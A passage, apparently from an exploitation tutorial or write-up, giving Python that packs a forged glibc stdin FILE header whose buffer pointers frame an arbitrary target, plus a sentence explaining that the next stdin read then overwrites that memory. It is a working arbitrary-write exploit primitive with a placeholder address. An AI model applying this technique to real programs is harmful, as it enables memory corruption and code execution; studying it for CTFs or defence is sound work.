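    """Build the first 0x48 bytes of a forged _IO_2_1_stdin_.

    target/size frame the memory that the next buffered read will fill.
    """
    fields = [
        flags,             # _flags
        0, 0, 0,           # read_ptr, read_end, read_base
        0, 0, 0,           # write_base, write_ptr, write_end
        target,            # buf_base: start of the region to overwrite
        target + size,     # buf_end: end of the region to overwrite
    ]
    return struct.pack("<9Q", *fields)


if __name__ == "__main__":
    payload = stdin_write_payload(0x601000, 0x100)  # made-up target
    print(len(payload), payload.hex())
```

After the forged header is in place, whatever the program reads next through stdin lands at target, provided the program requests fewer bytes than the framed region holds.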